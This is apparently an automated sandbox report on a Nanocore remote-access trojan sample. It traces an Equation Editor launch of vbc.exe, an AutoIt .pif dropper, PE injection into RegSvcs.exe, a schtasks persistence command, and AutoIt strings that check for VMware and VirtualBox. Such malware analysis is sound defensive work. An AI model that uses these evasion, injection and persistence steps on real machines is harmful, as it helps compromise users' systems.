Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwaretray.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe_
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwareUser.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenAq
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") ThenD6
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") ThenfMf
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VboxService.exex
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwareService.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666203454.0000000000914000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenr36\|
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") ThenC
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenU[U
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then48
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VMwaretray.exek
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Thent7n
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VboxService.exe

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027D353 VirtualQuery,GetSystemInfo,

4_2_0027D353

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0026A2DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0027AFB9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00289FD3 FindFirstFileExA,	4_2_00289FD3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE399B GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00FE399B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	5_2_00FFBCB3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01002408 FindFirstFileW,Sleep,FindNextFileW,FindClose,	5_2_01002408
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FF280D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01028877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_01028877
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FE1A73
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100CAE7 FindFirstFileW,FindNextFileW,FindClose,	5_2_0100CAE7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100DE7C FindFirstFileW,FindClose,	5_2_0100DE7C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00FFBF17

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBEE30 LoadLibraryA,GetProcAddress,

5_2_00FBEE30

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00286AF3 mov eax, dword ptr fs:[00000030h]

4_2_00286AF3

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0027E4F5

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0028ACA1 GetProcessHeap,

4_2_0028ACA1

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100A35D BlockInput,

5_2_0100A35D

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E643 SetUnhandledExceptionFilter,	4_2_0027E643
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0027E4F5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0027E7FB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00287BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00287BE1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCF170 SetUnhandledExceptionFilter,	5_2_00FCF170
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCA128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00FCA128
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC7CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00FC7CCD

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 7EFDE000	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 7EFDE000	Jump to behavior

Contains functionality to simulate keystroke presses

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

5_2_00FE43FF

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior

Contains functionality to execute programs as a different user

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE6C61 LogonUserW,

5_2_00FE6C61

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBD7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

5_2_00FBD7A0

Contains functionality to simulate mouse events

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE3321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,

5_2_00FE3321

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF602A GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

5_2_00FF602A

Source: RegSvcs.exe, 00000006.00000002.667114427.0000000002933000.00000004.00000001.sdmp	Binary or memory string: Program Manager48
Source: RegSvcs.exe, 00000006.00000002.667096389.000000000291F000.00000004.00000001.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: mmuiqlcvwo.pif.4.dr	Binary or memory string: IDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: mmuiqlcvwo.pif, 00000005.00000002.666605322.00000000013F0000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: Program ManagerV
Source: mmuiqlcvwo.pif, 00000005.00000000.479651653.0000000001032000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000000.511159853.0000000001032000.00000002.00020000.sdmp	Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, 00000005.00000002.666605322.00000000013F0000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: Program Manager<
Source: RegSvcs.exe, 00000006.00000002.667114427.0000000002933000.00000004.00000001.sdmp	Binary or memory string: Program Manager@

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\Public\vbc.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

4_2_00279D99

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027E34B cpuid

4_2_0027E34B

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027CBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,

4_2_0027CBB8

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FCE284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

5_2_00FCE284

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_01022BF9 GetUserNameW,

5_2_01022BF9

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0026A995 GetVersionExW,

4_2_0026A995

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

OS version to string mapping found (often used in BOTs)

Source: mmuiqlcvwo.pif	Binary or memory string: WIN_XP
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_XPe
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_VISTA
Source: mmuiqlcvwo.pif.4.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_7
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_8

Remote Access Functionality:

Detected Nanocore Rat

Source: mmuiqlcvwo.pif, 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeC